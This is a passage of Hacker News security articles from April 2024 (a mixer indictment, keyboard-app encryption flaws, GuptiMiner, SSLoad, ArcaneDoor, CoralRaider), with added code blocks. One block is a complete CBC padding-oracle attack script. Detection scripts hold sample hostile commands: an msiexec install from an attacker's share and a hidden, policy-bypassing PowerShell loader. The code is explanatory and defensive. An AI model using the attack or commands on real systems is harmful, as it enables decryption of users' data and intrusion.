Samourai offered a cryptocurrency mixing service known as Whirlpool to help users conceal the cryptocurrency transaction trail, in addition to incorporating an "exclusive transaction type" called Ricochet Send that made it possible to add intermediate hops when sending cryptocurrency from one address to another.
Whirlpool was advertised as a way to "mathematically disassociate the ownership of inputs to outputs in a given bitcoin transaction," which they claimed increases the privacy of the users involved, protects against financial surveillance, and improves the fungibility of the Bitcoin network.
"Ricochet defends against bitcoin blacklists by adding additional decoy transactions between the initial send and eventual recipient," according to the official documentation. "You should consider using Ricochet when sending to Bitcoin Exchanges, and companies that are known to close accounts for flimsy reasons."
The feature is engineered to prevent law enforcement and/or cryptocurrency exchanges from recognizing that a particular batch of cryptocurrency originated from criminal activity, the DoJ alleged.
Besides openly courting users (e.g., Russian oligarchs) to circumvent sanctions and launder criminal proceeds through Samourai on their X (formerly Twitter) account, the defendants have also been found transmitting to investors marketing materials that described how its user base was intended to include online gamblers and criminals who need the anonymity to conduct their illegal activities.
"Rodriguez and Hill acknowledge that its revenues will be derived from 'Dark/Grey Market participants' seeking to 'swap their bitcoins with multiple parties' to avoid detection," the DoJ said.
The arrests come weeks after a former security engineer named Shakeeb Ahmed was sentenced to three years in prison in the U.S. for charges relating to hacking two decentralized cryptocurrency exchanges in July 2022 and stealing over $12.3 million, which were then laundered using Samourai Whirlpool.
Google Postpones Third-Party Cookie Deprecation Amid U.K. Regulatory Scrutiny
27.4.24
Security
The Hacker News
Google has once again pushed back its plans to deprecate third-party tracking cookies in its Chrome web browser as it works to address outstanding competition concerns from U.K. regulators over its Privacy Sandbox initiative.
The tech giant said it's working closely with the U.K. Competition and Markets Authority (CMA) and hopes to achieve an agreement by the end of the year.
As part of the new timeline, it aims to start phasing out third-party cookies early next year, making it the third such extension since the tech giant announced the plans in 2020, postponing it from early 2022 to late 2023, and again to the second half of 2024.
Privacy Sandbox refers to a set of initiatives that offers privacy-preserving alternatives to tracking cookies and cross-app identifiers in order to serve tailored ads to users.
While Google has since enabled the features to a subset of Chrome browser users as of last year, the U.K. watchdog, alongside the Information Commissioner's Office (ICO), has been keeping a close eye on the implementation to ensure that Privacy Sandbox benefits consumers and doesn't favor Google's own advertising tech.
Both Apple and Mozilla have discontinued support for third-party cookies in their respective web browsers as of early 2020.
"We recognize that there are ongoing challenges related to reconciling divergent feedback from the industry, regulators and developers, and will continue to engage closely with the entire ecosystem," Google said in an update.
"It's also critical that the CMA has sufficient time to review all evidence including results from industry tests, which the CMA has asked market participants to provide by the end of June."
In a setback for Google, a draft report from the ICO revealed that the company's proposed replacements have gaps that advertisers could exploit to identify users, effectively undermining the privacy and anonymity objectives, according to the Wall Street Journal last week.
The development comes as Google said it's updating client-side encrypted (CSE) Google Meet calls to include support for inviting external participants, including those without a Google account.
Major Security Flaws Expose Keystrokes of Over 1 Billion Chinese Keyboard App Users
25.4.24
Vulnerability
The Hacker News
Security vulnerabilities uncovered in cloud-based pinyin keyboard apps could be exploited to reveal users' keystrokes to nefarious actors.
The findings come from the Citizen Lab, which discovered weaknesses in eight of nine apps from vendors like Baidu, Honor, iFlytek, OPPO, Samsung, Tencent, Vivo, and Xiaomi. The only vendor whose keyboard app did not have any security shortcomings was Huawei.
The vulnerabilities could be exploited to "completely reveal the contents of users' keystrokes in transit," researchers Jeffrey Knockel, Mona Wang, and Zoë Reichert said.
The disclosure builds upon prior research from the interdisciplinary laboratory based at the University of Toronto, which identified cryptographic flaws in Tencent's Sogou Input Method last August.
Collectively, it's estimated that close to one billion users are affected by this class of vulnerabilities, with Input Method Editors (IMEs) from Sogou, Baidu, and iFlytek accounting for a huge chunk of the market share.
A summary of the identified issues is as follows -
Tencent QQ Pinyin, which is vulnerable to a CBC padding oracle attack that could make it possible to recover plaintext
Baidu IME, which allows network eavesdroppers to decrypt network transmissions and extract the typed text on Windows owing to a bug in the BAIDUv3.1 encryption protocol
iFlytek IME, whose Android app allows network eavesdroppers to recover the plaintext of insufficiently encrypted network transmissions
Samsung Keyboard on Android, which transmits keystroke data via plain, unencrypted HTTP
Xiaomi, which comes preinstalled with keyboard apps from Baidu, iFlytek, and Sogou (and is therefore susceptible to the same aforementioned flaws)
OPPO, which comes preinstalled with keyboard apps from Baidu and Sogou (and is therefore susceptible to the same aforementioned flaws)
Vivo, which comes preinstalled with Sogou IME (and is therefore susceptible to the same aforementioned flaw)
Honor, which comes preinstalled with Baidu IME (and is therefore susceptible to the same aforementioned flaw)
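The CBC padding oracle listed against QQ Pinyin above is worth seeing end to end, because it shows why "the ciphertext is encrypted" is not the same as "the keystrokes are safe": a receiver that merely reveals whether PKCS#7 padding was valid lets a passive-plus-chosen-ciphertext attacker recover every byte without the key. The example below is added here and is not code from the Citizen Lab report or from any of the keyboard vendors. It assumes a toy 16-byte block cipher (a four-round SHA-256 Feistel network, standing in for AES so the script runs without third-party packages) and a constructed plaintext; the attack itself touches only the CBC/PKCS#7 layer and is the standard technique.

```python
import hashlib
import os

BLOCK = 16   # CBC block size in bytes
ROUNDS = 4

# Toy block cipher (assumption: a 4-round Feistel network keyed with SHA-256).
# Only its invertibility matters here; the attack below never calls it directly.
def _f(key: bytes, half: bytes, rnd: int) -> bytes:
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]

def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def encrypt_block(key: bytes, block: bytes) -> bytes:
    l, r = block[:8], block[8:]
    for rnd in range(ROUNDS):
        l, r = r, _xor(l, _f(key, r, rnd))
    return l + r

def decrypt_block(key: bytes, block: bytes) -> bytes:
    l, r = block[:8], block[8:]
    for rnd in reversed(range(ROUNDS)):
        l, r = _xor(r, _f(key, l, rnd)), l
    return l + r

# CBC with PKCS#7 padding. The bug is in make_oracle(): the receiver tells the
# sender whether the padding checked out (via a distinct error, status or timing).
def pkcs7_pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def pkcs7_unpad(data: bytes) -> bytes:
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(key: bytes, padded: bytes) -> bytes:
    iv = os.urandom(BLOCK)
    out, prev = [iv], iv
    for i in range(0, len(padded), BLOCK):
        prev = encrypt_block(key, _xor(padded[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)

def cbc_decrypt(key: bytes, ciphertext: bytes) -> bytes:
    blocks = [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    plain = b"".join(_xor(decrypt_block(key, blocks[i]), blocks[i - 1])
                     for i in range(1, len(blocks)))
    return pkcs7_unpad(plain)

def make_oracle(key: bytes):
    """Models a server that leaks 'padding ok' / 'padding bad' for any ciphertext."""
    def oracle(ciphertext: bytes) -> bool:
        try:
            cbc_decrypt(key, ciphertext)
            return True
        except ValueError:
            return False
    return oracle

# The attack: recover one plaintext block from the oracle, the block itself and
# the ciphertext block that precedes it. No key material is ever used.
def recover_block(oracle, prev: bytes, target: bytes) -> bytes:
    inter = bytearray(BLOCK)          # D_k(target), learned from the right end
    for pos in range(BLOCK - 1, -1, -1):
        pad = BLOCK - pos
        forged = bytearray(BLOCK)
        for j in range(pos + 1, BLOCK):   # known bytes are steered to decrypt to `pad`
            forged[j] = inter[j] ^ pad
        for guess in range(256):
            forged[pos] = guess
            if not oracle(bytes(forged) + target):
                continue
            if pos == BLOCK - 1:
                # Rule out a lucky 0x02 0x02 (or longer) padding: disturb the byte
                # to the left; a genuine 0x01 padding is unaffected by that change.
                forged[pos - 1] ^= 0xFF
                still_ok = oracle(bytes(forged) + target)
                forged[pos - 1] ^= 0xFF
                if not still_ok:
                    continue
            inter[pos] = guess ^ pad
            break
    return _xor(bytes(inter), prev)

def recover_plaintext(oracle, ciphertext: bytes) -> bytes:
    blocks = [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    recovered = b"".join(recover_block(oracle, blocks[i - 1], blocks[i])
                         for i in range(1, len(blocks)))
    return pkcs7_unpad(recovered)

def demo(message: bytes = b"nihao shijie 12345 (constructed keystrokes)") -> bytes:
    key = os.urandom(16)
    ciphertext = cbc_encrypt(key, pkcs7_pad(message))   # what the eavesdropper captures
    return recover_plaintext(make_oracle(key), ciphertext)  # attacker never sees `key`

if __name__ == "__main__":
    print(demo())
```

Each recovered byte costs at most 256 oracle queries (plus one disambiguation query for the last byte of each block), so a 48-byte transmission falls in a few thousand requests. The fix is not a cleverer padding check but an authenticated mode (AES-GCM, or encrypt-then-MAC) wrapped in a standard transport such as TLS, which is exactly the "use well-tested protocols" recommendation that follows.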
Successful exploitation of these vulnerabilities could permit adversaries to decrypt Chinese mobile users' keystrokes entirely passively, without sending any additional network traffic. Following responsible disclosure, every keyboard app developer with the exception of Honor and Tencent (QQ Pinyin) had addressed the issues as of April 1, 2024.
Users are advised to keep their apps and operating systems up-to-date and to switch to a keyboard app that operates entirely on-device to mitigate these privacy issues.
Other recommendations call on app developers to use well-tested and standard encryption protocols instead of developing homegrown versions that could have security problems. App store operators have also been urged not to geoblock security updates and allow developers to attest to all data being transmitted with encryption.
The Citizen Lab theorized it's possible that Chinese app developers are less inclined to use "Western" cryptographic standards owing to concerns that they may contain backdoors of their own, prompting them to develop in-house ciphers.
"Given the scope of these vulnerabilities, the sensitivity of what users type on their devices, the ease with which these vulnerabilities may have been discovered, and that the Five Eyes have previously exploited similar vulnerabilities in Chinese apps for surveillance, it is possible that such users' keystrokes may have also been under mass surveillance," the researchers said.
eScan Antivirus Update Mechanism Exploited to Spread Backdoors and Miners
25.4.24
Virus
The Hacker News
A new malware campaign has been exploiting the updating mechanism of the eScan antivirus software to distribute backdoors and cryptocurrency miners like XMRig through a long-standing threat codenamed GuptiMiner targeting large corporate networks.
Cybersecurity firm Avast said the activity is the work of a threat actor with possible connections to a North Korean hacking group dubbed Kimsuky, which is also known as Black Banshee, Emerald Sleet, and TA427.
"GuptiMiner is a highly sophisticated threat that uses an interesting infection chain along with a couple of techniques that include performing DNS requests to the attacker's DNS servers, performing sideloading, extracting payloads from innocent-looking images, signing its payloads with a custom trusted root anchor certification authority, among others," Avast said.
The intricate and elaborate infection chain, at its core, leverages a security shortcoming in the update mechanism of Indian antivirus vendor eScan to propagate the malware by means of an adversary-in-the-middle (AitM) attack.
Specifically, it entails hijacking the updates by substituting the package file with a malicious version, taking advantage of the fact that the downloads were neither signed nor secured using HTTPS. The issue, which went unnoticed for at least five years, has been rectified as of July 31, 2023.
The rogue DLL ("updll62.dlz") executed by the eScan software side-loads a DLL ("version.dll") to activate a multi-stage sequence starting with a PNG file loader that, in turn, employs malicious DNS servers to contact a command-and-control (C2) server and fetch a PNG file with appended shellcode.
"GuptiMiner hosts their own DNS servers for serving true destination domain addresses of C&C servers via DNS TXT responses," researchers Jan Rubín and Milánek said.
"As the malware connects to the malicious DNS servers directly, the DNS protocol is completely separated from the DNS network. Thus, no legitimate DNS server will ever see the traffic from this malware."
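The "private DNS" trick quoted above is also the campaign's most visible network artifact: a workstation talking DNS (and asking for TXT records) to a resolver that is not one of the organisation's own is rarely legitimate. The detection below is an added example, not code from Avast or from any product; the resolver addresses, internal ranges and the Zeek-style log lines are constructed for illustration.

```python
from ipaddress import ip_address, ip_network

# Assumption: the organisation's sanctioned resolvers and internal address space.
APPROVED_RESOLVERS = {"10.0.0.53", "10.0.1.53"}
INTERNAL_NETS = [ip_network("10.0.0.0/8"), ip_network("192.168.0.0/16")]

# Constructed sample records: ts src dst dport proto qtype query
SAMPLE_DNS_LOG = """\
1714000001.1 10.0.5.21 10.0.0.53 53 udp A updates.vendor.example
1714000002.3 10.0.5.21 10.0.0.53 53 udp TXT _dmarc.example.org
1714000003.7 10.0.5.21 203.0.113.45 53 udp TXT cdn-telemetry.example
1714000004.2 10.0.7.9 198.51.100.7 53 tcp TXT metrics.example
1714000005.0 10.0.7.9 10.0.9.9 53 udp A printer.corp.example
1714000006.4 10.0.7.9 10.0.1.53 443 tcp - -
"""

def parse_dns_line(line: str) -> dict:
    ts, src, dst, dport, proto, qtype, query = line.split()
    return {"ts": float(ts), "src": src, "dst": dst, "dport": int(dport),
            "proto": proto, "qtype": qtype, "query": query}

def is_internal(ip: str) -> bool:
    addr = ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)

def find_rogue_resolvers(log_text: str) -> list:
    """Flag DNS traffic that bypasses the approved resolvers.

    External destination + TXT lookup is rated high: that is the shape of a
    client fetching C2 addresses from an attacker-run DNS server.
    """
    findings = []
    for line in log_text.splitlines():
        rec = parse_dns_line(line)
        if rec["dport"] != 53 or rec["dst"] in APPROVED_RESOLVERS:
            continue
        external = not is_internal(rec["dst"])
        if external and rec["qtype"] == "TXT":
            severity = "high"
        elif external:
            severity = "medium"
        else:
            severity = "low"      # unsanctioned internal resolver: misconfiguration or pivot
        findings.append({**rec, "severity": severity})
    return findings

if __name__ == "__main__":
    for f in find_rogue_resolvers(SAMPLE_DNS_LOG):
        print(f["severity"], f["src"], "->", f["dst"], f["qtype"], f["query"])
```

On a real network the same rule is usually enforced rather than merely detected: block outbound 53/udp and 53/tcp (and DoH endpoints) from clients except to the approved resolvers, so malware that "hosts its own DNS servers" simply fails to resolve its C2.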
The PNG file is then parsed to extract the shellcode, which is then responsible for executing a Gzip loader that's designed to decompress another shellcode using Gzip and execute it in a separate thread.
The third-stage malware, dubbed Puppeteer, pulls all the strings, ultimately deploying the XMRig cryptocurrency miner and backdoors on the infected systems.
Avast said it encountered two different types of backdoors that come fitted with features to enable lateral movement, accept commands from the threat actor, and deliver additional components as required.
"The first is an enhanced build of PuTTY Link, providing SMB scanning of the local network and enabling lateral movement over the network to potentially vulnerable Windows 7 and Windows Server 2008 systems on the network," the researchers explained.
"The second backdoor is multi-modular, accepting commands from the attacker to install more modules as well as focusing on scanning for stored private keys and crypto wallets on the local system."
The deployment of XMRig has been described as "unexpected" for what's otherwise a complex and meticulously executed operation, raising the possibility that the miner acts as a distraction to prevent victims from discovering the true extent of the compromise.
GuptiMiner, known to be active since at least 2018, also makes use of various techniques like anti-VM and anti-debug tricks, code virtualization, dropping the PNG loader during system shutdown events, storing payloads in Windows Registry, and adding a root certificate to Windows' certificate store to make the PNG loader DLLs appear trustworthy.
The links to Kimsuky come from an information stealer that, while not distributed by GuptiMiner or via the infection flow, has been used "across the whole GuptiMiner campaign" and shares overlaps with a keylogger previously identified as utilized by the group.
It's currently not clear who the targets of the campaign are, but GuptiMiner artifacts have been uploaded to VirusTotal from India and Germany as early as April 2018, with Avast telemetry data highlighting new infections likely originating from out-of-date eScan clients.
The findings come as the Korean National Police Agency (KNPA) called out North Korean hacking crews such as Lazarus, Andariel, and Kimsuky for targeting the defense sector in the country and exfiltrating valuable data from some of them.
A report from the Korea Economic Daily said the threat actors penetrated the networks of 83 South Korean defense contractors and stole confidential information from about 10 of them from October 2022 to July 2023.
U.S. Treasury Sanctions Iranian Firms and Individuals Tied to Cyber Attacks
25.4.24
BigBrothers
The Hacker News
The U.S. Treasury Department's Office of Foreign Assets Control (OFAC) on Monday sanctioned two firms and four individuals for their involvement in malicious cyber activities on behalf of the Iranian Islamic Revolutionary Guard Corps Cyber Electronic Command (IRGC-CEC) from at least 2016 to April 2021.
This includes the front companies Mehrsam Andisheh Saz Nik (MASN) and Dadeh Afzar Arman (DAA), as well as the Iranian nationals Alireza Shafie Nasab, Reza Kazemifar Rahman, Hossein Mohammad Harooni, and Komeil Baradaran Salmani.
"These actors targeted more than a dozen U.S. companies and government entities through cyber operations, including spear-phishing and malware attacks," the Treasury Department said.
Concurrent with the sanctions, the U.S. Department of Justice (DoJ) unsealed an indictment against the four individuals for orchestrating cyber attacks targeting the U.S. government and private entities.
Furthermore, a reward of up to $10 million has been announced as part of the U.S. Department of State's Rewards for Justice program for information leading to the identification or location of the group and the defendants.
It's worth noting that Nasab, who worked for MASN, was charged in a previous indictment that was unsealed on February 29, 2024. The defendants remain at large.
Rahman, also employed by MASN, is alleged to have worked on testing malware intended to target job seekers with a focus on military veterans. He also purportedly worked for the Iranian Organization for Electronic Warfare and Cyber Defense (EWCD), a component of IRGC, from about 2014 through 2020.
MASN (formerly Mahak Rayan Afraz and Dehkadeh Telecommunication and Security Company) is tracked by the cybersecurity community under the name Tortoiseshell and is one of the many contracting companies that act as a cover for malicious campaigns orchestrated by IRGC. It was liquidated in June 2023.
The U.S. Treasury Department said the second sanctioned company also "engaged in malicious cyber campaigns on behalf of the IRGC-CEC," noting that Harooni was employed by DAA and has carried out spear-phishing and social engineering attacks against U.S. organizations.
Salmani is said to be associated with multiple IRGC-CEC front companies, including MASN, and involved in spear-phishing campaigns targeting U.S. entities. Nasab, Harooni, and Salmani have also been responsible for procuring and maintaining the online network infrastructure used to facilitate the intrusions, the DoJ said.
In all, in the coordinated multi-year hacking spree, the defendants primarily singled out private sector defense contractors and other government entities, ultimately compromising more than 200,000 employee accounts.
Each of the defendants has been charged with conspiracy to commit computer fraud, conspiracy to commit wire fraud, and wire fraud. If convicted, they face up to five years in prison for the computer fraud conspiracy, and up to 20 years in prison for each count of wire fraud and conspiracy to commit wire fraud.
Furthermore, Harooni has been charged with knowingly damaging a protected computer, which carries a maximum penalty of 10 years in prison. Nasab, Harooni, and Salmani have also been charged with aggravated identity theft, which carries a mandatory consecutive term of two years in prison.
"Criminal activity originating from Iran poses a grave threat to America's national security and economic stability," said Attorney General Merrick B. Garland in a statement.
"These defendants are alleged to have engaged in a coordinated, multi-year hacking campaign from Iran targeting more than a dozen American companies and the U.S. Treasury and State Departments."
The development comes amid geopolitical tensions in the Middle East after an Israeli air strike bombed Iran's embassy in Syria, prompting the latter to launch a drone-and-missile attack on Israel, which, in turn, led to an Israeli missile strike hitting an air defense radar system near Isfahan.
Researchers Detail Multistage Attack Hijacking Systems with SSLoad, Cobalt Strike
25.4.24
APT
The Hacker News
Cybersecurity researchers have discovered an ongoing attack campaign that's leveraging phishing emails to deliver malware called SSLoad.
The campaign, codenamed FROZEN#SHADOW by Securonix, also involves the deployment of Cobalt Strike and the ConnectWise ScreenConnect remote desktop software.
"SSLoad is designed to stealthily infiltrate systems, gather sensitive information and transmit its findings back to its operators," security researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov said in a report shared with The Hacker News.
"Once inside the system, SSLoad deploys multiple backdoors and payloads to maintain persistence and avoid detection."
Attack chains involve the use of phishing messages to randomly target organizations in Asia, Europe, and the Americas, with emails containing links that lead to the retrieval of a JavaScript file that kicks off the infection flow.
Earlier this month, Palo Alto Networks uncovered at least two different methods by which SSLoad is distributed, one which entails the use of website contact forms to embed booby-trapped URLs and another involving macro-enabled Microsoft Word documents.
The latter is also notable for the fact that the malware acts as a conduit for delivering Cobalt Strike, while the former has been used to deliver a different malware called Latrodectus, a likely successor to IcedID.
The obfuscated JavaScript file ("out_czlrh.js"), when launched and run using wscript.exe, retrieves an MSI installer file ("slack.msi") by connecting to a network share located at "\\wireoneinternet[.]info@80\share\" and runs it using msiexec.exe.
The MSI installer, for its part, contacts an attacker-controlled domain to fetch and execute the SSLoad malware payload using rundll32.exe, following which it beacons to a command-and-control (C2) server along with information about the compromised system.
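The chain in the two paragraphs above (script host, then msiexec.exe pulling an MSI from a \\host@80\share path, then rundll32.exe) is unusual enough in its parent-child shape to detect on process telemetry alone: the @80 suffix in a UNC path means the "share" is a WebDAV server reached over HTTP, not SMB. The example below is added here and is not code from Securonix or from any product; the Sysmon-style process events are constructed, the UNC path is the page's defanged form, and the PID values are made up.

```python
import re

# \\host@80\share or \\host@ssl@443\share: a WebDAV share reached over HTTP(S).
WEBDAV_UNC = re.compile(r"\\\\[^\\\s]+@(?:ssl@)?\d+\\", re.I)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}

# Constructed Sysmon Event ID 1 style records (pid, ppid, image, command line).
SAMPLE_EVENTS = [
    {"pid": 4001, "ppid": 3000, "image": r"C:\Windows\explorer.exe",
     "cmd": "explorer.exe"},
    {"pid": 4102, "ppid": 4001, "image": r"C:\Windows\System32\wscript.exe",
     "cmd": r'wscript.exe "C:\Users\u\Downloads\out_czlrh.js"'},
    {"pid": 4155, "ppid": 4102, "image": r"C:\Windows\System32\msiexec.exe",
     "cmd": r"msiexec.exe /i \\wireoneinternet[.]info@80\share\slack.msi /qn"},
    {"pid": 4190, "ppid": 4155, "image": r"C:\Windows\System32\rundll32.exe",
     "cmd": r"rundll32.exe C:\ProgramData\stage.dll,Entry"},
    {"pid": 5001, "ppid": 4001, "image": r"C:\Windows\System32\msiexec.exe",
     "cmd": r"msiexec.exe /i C:\Temp\vendor.msi /qn"},   # benign local install
]

def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def ancestors(by_pid: dict, pid: int) -> list:
    """Return the event for `pid` followed by its parent, grandparent, ..."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid]["ppid"]
    return chain

def detect_ssload_chain(events: list) -> list:
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for ev in events:
        names = [_basename(c["image"]) for c in ancestors(by_pid, ev["pid"])]
        me, parents = names[0], names[1:]
        if me == "msiexec.exe" and WEBDAV_UNC.search(ev["cmd"]) and SCRIPT_HOSTS & set(parents):
            findings.append({"pid": ev["pid"], "stage": "msi-from-webdav-share-via-script-host",
                             "chain": names})
        elif me == "rundll32.exe" and parents[:1] == ["msiexec.exe"] and SCRIPT_HOSTS & set(parents[1:]):
            findings.append({"pid": ev["pid"], "stage": "rundll32-under-msiexec-from-script-host",
                             "chain": names})
    return findings

if __name__ == "__main__":
    for f in detect_ssload_chain(SAMPLE_EVENTS):
        print(f["pid"], f["stage"], " <- ".join(f["chain"]))
```

The two rules fire at different points in the chain, so the first one gives a chance to block before the DLL stage runs; the benign local msiexec.exe run is not flagged because it has neither the WebDAV path nor a script-host ancestor.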
The initial reconnaissance phase paves the way for Cobalt Strike, a legitimate adversary simulation software, which is then used to download and install ScreenConnect, thereby allowing the threat actors to remotely commandeer the host.
"With full access to the system the threat actors began attempting to acquire credentials and gather other critical system details," the researchers said. "At this stage they started scanning the victim host for credentials stored in files as well as other potentially sensitive documents."
The attackers have also been observed pivoting to other systems in the network, including the domain controller, ultimately infiltrating the victim's Windows domain by creating their own domain administrator account.
"With this level of access, they could get into any connected machine within the domain," the researchers said. "In the end, this is the worst case scenario for any organization as this level of persistence achieved by the attackers would be incredibly time consuming and costly to remediate."
The disclosure comes as the AhnLab Security Intelligence Center (ASEC) revealed that Linux systems are being infected with an open-source remote access trojan called Pupy RAT.
State-Sponsored Hackers Exploit Two Cisco Zero-Day Vulnerabilities for Espionage
25.4.24
APT
The Hacker News
A new malware campaign leveraged two zero-day flaws in Cisco networking gear to deliver custom malware and facilitate covert data collection on target environments.
Cisco Talos, which dubbed the activity ArcaneDoor, attributed it to a previously undocumented, sophisticated state-sponsored actor it tracks under the name UAT4356 (aka Storm-1849 by Microsoft).
"UAT4356 deployed two backdoors as components of this campaign, 'Line Runner' and 'Line Dancer,' which were used collectively to conduct malicious actions on-target, which included configuration modification, reconnaissance, network traffic capture/exfiltration and potentially lateral movement," Talos said.
The intrusions, which were first detected and confirmed in early January 2024, entail the exploitation of two vulnerabilities -
CVE-2024-20353 (CVSS score: 8.6) - Cisco Adaptive Security Appliance and Firepower Threat Defense Software Web Services Denial-of-Service Vulnerability
CVE-2024-20359 (CVSS score: 6.0) - Cisco Adaptive Security Appliance and Firepower Threat Defense Software Persistent Local Code Execution Vulnerability
It's worth noting that a zero-day exploit is the technique or attack a malicious actor deploys to leverage a security vulnerability that is not yet known to the vendor, and therefore unpatched, to gain access to a system.
While the second flaw allows a local attacker to execute arbitrary code with root-level privileges, administrator-level privileges are required to exploit it. Addressed alongside CVE-2024-20353 and CVE-2024-20359 is a command injection flaw in the same appliance (CVE-2024-20358, CVSS score: 6.0) that was uncovered during internal security testing.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added the shortcomings to its Known Exploited Vulnerabilities (KEV) catalog, requiring federal agencies to apply the vendor-provided fixes by May 1, 2024.
The exact initial access pathway used to breach the devices is presently unknown, although UAT4356 is said to have started preparations for it as early as July 2023.
A successful foothold is followed by the deployment of two implants named Line Dancer and Line Runner, the former of which is an in-memory backdoor that enables attackers to upload and execute arbitrary shellcode payloads, including disabling system logs and exfiltrating packet captures.
Line Runner, on the other hand, is a persistent HTTP-based Lua implant installed on the Cisco Adaptive Security Appliance (ASA) by leveraging the aforementioned zero-days such that it can survive across reboots and upgrades. It has been observed being used to fetch information staged by Line Dancer.
"It is suspected that Line Runner may be present on a compromised device even if Line Dancer is not (e.g., as a persistent backdoor, or where an impacted ASA has not yet received full operational attention from the malicious actors)," according to a joint advisory published by cybersecurity agencies from Australia, Canada, and the U.K.
At every phase of the attack, UAT4356 is said to have demonstrated meticulous attention to hiding digital footprints and the ability to employ intricate methods to evade memory forensics and lower the chances of detection, contributing to its sophistication and elusive nature.
This also suggests that the threat actors have a complete understanding of the inner workings of the ASA itself and of the "forensic actions commonly performed by Cisco for network device integrity validation."
Exactly which country is behind ArcaneDoor is unclear, however both Chinese and Russian state-backed hackers have targeted Cisco routers for cyber espionage purposes in the past. Cisco Talos also did not specify how many customers were compromised in these attacks.
The development once again highlights the increased targeting of edge devices and platforms such as email servers, firewalls, and VPNs that traditionally lack endpoint detection and response (EDR) solutions, as evidenced by the recent string of attacks targeting Barracuda Networks, Fortinet, Ivanti, Palo Alto Networks, and VMware.
"Perimeter network devices are the perfect intrusion point for espionage-focused campaigns," Talos said.
"As a critical path for data into and out of the network, these devices need to be routinely and promptly patched; using up-to-date hardware and software versions and configurations; and be closely monitored from a security perspective. Gaining a foothold on these devices allows an actor to directly pivot into an organization, reroute or modify traffic and monitor network communications."
CoralRaider Malware Campaign Exploits CDN Cache to Spread Info-Stealers
24.4.24
Virus
The Hacker News
A new ongoing malware campaign has been observed distributing three different stealers, namely CryptBot, LummaC2, and Rhadamanthys, hosted on Content Delivery Network (CDN) cache domains since at least February 2024.
Cisco Talos has attributed the activity with moderate confidence to a threat actor tracked as CoralRaider, a suspected Vietnamese-origin group that came to light earlier this month.
This assessment is based on "several overlaps in tactics, techniques, and procedures (TTPs) of CoralRaider's Rotbot campaign, including the initial attack vector of the Windows Shortcut file, intermediate PowerShell decryptor and payload download scripts, the FoDHelper technique used to bypass User Access Controls (UAC) of the victim machine," the company said.
Targets of the campaign span various business verticals across geographies, including the U.S., Nigeria, Pakistan, Ecuador, Germany, Egypt, the U.K., Poland, the Philippines, Norway, Japan, Syria, and Turkey.
Attack chains involve users downloading files masquerading as movie files via a web browser, raising the possibility of a large-scale attack.
"This threat actor is using a Content Delivery Network (CDN) cache to store the malicious files on their network edge host in this campaign, avoiding request delay," Talos researchers Joey Chen, Chetan Raghuprasad, and Alex Karkins said. "The actor is using the CDN cache as a download server to deceive network defenders."
The initial access vector for the drive-by downloads is suspected to be phishing emails, using them as a conduit to propagate booby-trapped links pointing to ZIP archives containing a Windows shortcut (LNK) file.
The shortcut file, in turn, runs a PowerShell script to fetch a next-stage HTML application (HTA) payload hosted on the CDN cache, which subsequently runs JavaScript code to launch an embedded PowerShell loader that takes steps to fly under the radar and ultimately downloads and runs one of the three stealers.
The modular PowerShell loader script is designed to bypass User Account Control (UAC) on the victim's machine using a known technique called FodHelper, which has also been put to use by Vietnamese threat actors linked to another stealer known as NodeStealer that's capable of stealing Facebook account data.
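The FodHelper bypass mentioned above works by planting a command under the current user's ms-settings ProgID (HKCU\Software\Classes\ms-settings\shell\open\command, with an empty DelegateExecute value) so that the auto-elevating fodhelper.exe runs it at high integrity; because the key lives in HKCU, an unprivileged process can write it, which also makes it a clean registry-based detection. The example below is added here and is not code from Cisco Talos or from any product; the Sysmon Event ID 13 style records are constructed.

```python
import re

# The registry locations the publicly documented FodHelper bypass writes to.
FODHELPER_TARGET = re.compile(
    r"\\Software\\Classes\\ms-settings\\shell\\open\\command"
    r"(?:\\(?:DelegateExecute|\(Default\)))?$",
    re.I,
)

# Constructed Sysmon Event ID 13 (RegistryEvent SetValue) style records.
SAMPLE_REGISTRY_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "target": r"HKU\S-1-5-21-1\Software\Classes\ms-settings\shell\open\command\DelegateExecute",
     "details": "(Empty)"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "target": r"HKU\S-1-5-21-1\Software\Classes\ms-settings\shell\open\command\(Default)",
     "details": "powershell -w hidden -ep bypass -f C:\\Users\\Public\\loader.ps1"},
    {"image": r"C:\Program Files\Vendor\setup.exe",
     "target": r"HKU\S-1-5-21-1\Software\Classes\.vndr\shell\open\command\(Default)",
     "details": "\"C:\\Program Files\\Vendor\\app.exe\" \"%1\""},   # ordinary file association
]

def detect_fodhelper(events: list) -> list:
    """Return every SetValue event that lands on the FodHelper hijack key."""
    findings = []
    for ev in events:
        if FODHELPER_TARGET.search(ev["target"]):
            findings.append({
                "image": ev["image"],
                "value": ev["target"].rsplit("\\", 1)[-1],
                "payload": ev["details"],
            })
    return findings

if __name__ == "__main__":
    for f in detect_fodhelper(SAMPLE_REGISTRY_EVENTS):
        print(f["image"], f["value"], f["payload"])
```

Pairing this with a process rule (fodhelper.exe spawning anything other than SystemSettings.exe) catches the execution half of the same technique; on the prevention side, setting UAC to "Always notify" removes the silent auto-elevation the bypass depends on.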
The stealer malware, regardless of what's deployed, grabs victims' information, such as system and browser data, credentials, cryptocurrency wallets, and financial information.
What's notable about the campaign is that it utilizes an updated version of CryptBot that packs in new anti-analysis techniques and also captures password manager application databases and authenticator application information.
